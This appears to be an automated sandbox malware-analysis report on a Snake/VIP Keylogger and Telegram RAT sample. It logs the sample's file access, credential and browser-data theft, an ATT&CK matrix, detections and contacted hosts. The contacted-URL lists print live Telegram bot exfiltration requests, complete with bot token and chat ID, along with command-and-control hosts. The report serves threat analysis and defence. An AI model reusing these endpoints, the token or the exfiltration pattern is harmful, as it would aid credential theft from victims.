Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\r5yYt97sfB.exe

Code function: 1_2_004061A5 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

1_2_004061A5

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 0000000B.00000002.3827428231.0000000025D01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0000000B.00000002.3827428231.0000000025EEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 7864, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match

File source: 0000000B.00000002.3827428231.0000000025EEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\msiexec.exe

File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\

Jump to behavior

Source: Yara match

File source: Process Memory Space: msiexec.exe PID: 7864, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 0000000B.00000002.3827428231.0000000025D01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0000000B.00000002.3827428231.0000000025EEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 7864, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match

File source: 0000000B.00000002.3827428231.0000000025EEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	2 Obfuscated Files or Information	1 OS Credential Dumping	3 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 PowerShell	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 Software Packing	LSASS Memory	14 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	311 Process Injection	1 DLL Side-Loading	Security Account Manager	11 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Masquerading	NTDS	1 Process Discovery	Distributed Component Object Model	1 Clipboard Data	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	21 Virtualization/Sandbox Evasion	LSA Secrets	21 Virtualization/Sandbox Evasion	SSH	Keylogging	15 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Access Token Manipulation	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	311 Process Injection	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
r5yYt97sfB.exe	72%	Virustotal		Browse
r5yYt97sfB.exe	55%	ReversingLabs	Win32.Spyware.Snakekeylogger

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nss7012.tmp\nsExec.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\magmaet\clenched\Gruppekonto\r5yYt97sfB.exe	55%	ReversingLabs	Win32.Spyware.Snakekeylogger

Source	Detection	Scanner	Label	Link
http://51.38.247.67:8081/_send_.php?L	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
drive.google.com	216.58.206.46	true	false	high
drive.usercontent.google.com	142.250.186.129	true	false	high
reallyfreegeoip.org	104.21.80.1	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	132.226.8.169	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
https://api.telegram.org/bot7888983233:AAGHDGX41oFk6oqVx8IC3EbSn56Cf9Te8YI/sendDocument?chat_id=8150022612&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery	false	high
https://api.telegram.org/bot7888983233:AAGHDGX41oFk6oqVx8IC3EbSn56Cf9Te8YI/sendDocument?chat_id=8150022612&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery	false	high
http://checkip.dyndns.org/	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:390120%0D%0ADate%20and%20Time:%2011/01/2025%20/%2000:31:01%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20390120%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	msiexec.exe, 0000000B.00000002.3827428231.0000000025EC4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	msiexec.exe, 0000000B.00000002.3828910007.0000000027011000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3828910007.0000000026D21000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	msiexec.exe, 0000000B.00000002.3828910007.0000000027011000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3828910007.0000000026D21000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org	msiexec.exe, 0000000B.00000002.3827428231.0000000025F02000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025EEE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025DE2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	msiexec.exe, 0000000B.00000002.3828910007.0000000027011000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3828910007.0000000026D21000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	msiexec.exe, 0000000B.00000002.3827428231.0000000025EEE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025DE2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://translate.google.com/translate_a/element.js	msiexec.exe, 0000000B.00000003.2652184692.000000000A19C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2652094737.000000000A19C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.office.com/lB	msiexec.exe, 0000000B.00000002.3827428231.0000000025EBF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	msiexec.exe, 0000000B.00000002.3828910007.0000000027011000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3828910007.0000000026D21000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/	msiexec.exe, 0000000B.00000003.2685537438.000000000A195000.00000004.00000020.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	msiexec.exe, 0000000B.00000002.3827428231.0000000025D01000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	msiexec.exe, 0000000B.00000002.3828910007.0000000027011000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3828910007.0000000026D21000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	r5yYt97sfB.exe, r5yYt97sfB.exe.5.dr	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	msiexec.exe, 0000000B.00000002.3827428231.0000000025DE2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en	msiexec.exe, 0000000B.00000002.3827428231.0000000025E92000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025EC4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025E83000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	msiexec.exe, 0000000B.00000002.3828910007.0000000027011000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3828910007.0000000026D21000.00000004.00000800.00020000.00000000.sdmp	false		high
http://varders.kozow.com:8081	msiexec.exe, 0000000B.00000002.3827428231.0000000025D01000.00000004.00000800.00020000.00000000.sdmp	false		high
http://aborters.duckdns.org:8081	msiexec.exe, 0000000B.00000002.3827428231.0000000025D01000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	msiexec.exe, 0000000B.00000002.3828910007.0000000027011000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3828910007.0000000026D21000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com	msiexec.exe, 0000000B.00000003.2652184692.000000000A19C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2652094737.000000000A19C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://51.38.247.67:8081/_send_.php?L	msiexec.exe, 0000000B.00000002.3827428231.0000000025EEE000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://drive.google.com/	msiexec.exe, 0000000B.00000002.3814361627.000000000A11A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://anotherarmy.dns.army:8081	msiexec.exe, 0000000B.00000002.3827428231.0000000025D01000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	msiexec.exe, 0000000B.00000002.3828910007.0000000027011000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3828910007.0000000026D21000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=enlB	msiexec.exe, 0000000B.00000002.3827428231.0000000025E8D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.189$	msiexec.exe, 0000000B.00000002.3827428231.0000000025DBB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025D75000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025DE2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot7888983233:AAGHDGX41oFk6oqVx8IC3EbSn56Cf9Te8YI/sendDocument?chat_id=8150	msiexec.exe, 0000000B.00000002.3827428231.0000000025EEE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	msiexec.exe, 0000000B.00000002.3827428231.0000000025DBB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025D4B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025DE2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://apis.google.com	msiexec.exe, 0000000B.00000003.2652184692.000000000A19C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2652094737.000000000A19C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://api.telegram.org	msiexec.exe, 0000000B.00000002.3827428231.0000000025F02000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025EEE000.00000004.00000800.00020000.00000000.sdmp	false		high
